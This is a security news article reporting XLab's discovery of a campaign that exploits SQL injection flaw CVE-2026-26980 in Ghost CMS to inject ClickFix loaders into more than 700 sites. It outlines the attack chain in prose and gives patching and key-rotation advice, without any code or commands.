Researchers at **Qianxin**'s XLab threat intelligence team have uncovered a widespread campaign exploiting a critical SQL injection vulnerability (**CVE-2026-26980**) affecting **Ghost CMS**. This vulnerability is being leveraged to inject malicious JavaScript code, triggering ClickFix attack flows on a large scale. ### Scope of the Attack The XLab researchers confirmed that over 700 domains have been impacted, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs. High-profile institutions such as **Harvard University**, **Oxford University**, **Auburn University**, and even **DuckDuckGo** have been among the compromised sites.  *Source: XLab* ### CVE-2026-26980: The Vulnerability **CVE-2026-26980** impacts **Ghost** versions 3.24.0 through 6.19.0. It allows unauthenticated attackers to read arbitrary data from the website database, including the all-important admin API keys. These keys grant extensive management access, enabling modification of users, articles, and themes. A patch was released on February 19 in **Ghost CMS** version 6.19.1; however, many sites have yet to apply the necessary security update. **SentinelOne** published details on February 27 regarding the exploitation of **CVE-2026-26980**, including detection methods. Their research identified multiple distinct activity clusters targeting vulnerable Ghost sites, with some domains being repeatedly infected with different scripts.  *Source: XLab* ### Attack Chain Breakdown The observed attacks follow a specific pattern: 1. **Exploitation:** Attackers exploit **CVE-2026-26980** to steal admin API keys. 2. **Injection:** They use the stolen API keys to inject malicious JavaScript into articles. 3. **Staging:** The injected JavaScript acts as a lightweight loader, fetching second-stage code from the attacker's infrastructure. 4. **Fingerprinting:** This second-stage code fingerprints visitors to identify potential targets. 5. **ClickFix Lure:** Targeted visitors are presented with a fake **Cloudflare** prompt via an iframe, leading to the ClickFix lure.  *Source: XLab* Victims are then instructed to paste a provided command into their Windows command prompt, which drops a payload onto their systems. Payloads observed include DLL loaders, JavaScript droppers, and an Electron-based malware sample named `UtilifySetup.exe`. .jpg) *Source: XLab* ### Mitigation Strategies The most critical step is to upgrade to **Ghost CMS** version 6.19.1 or later and rotate all previously used keys, as they should be considered compromised. XLab has provided indicators of compromise (IoCs), including injected scripts, which should be used to thoroughly review websites and remove any malicious code. Website owners are also advised to maintain a 30-day record of admin API call logs to facilitate effective retrospective investigations.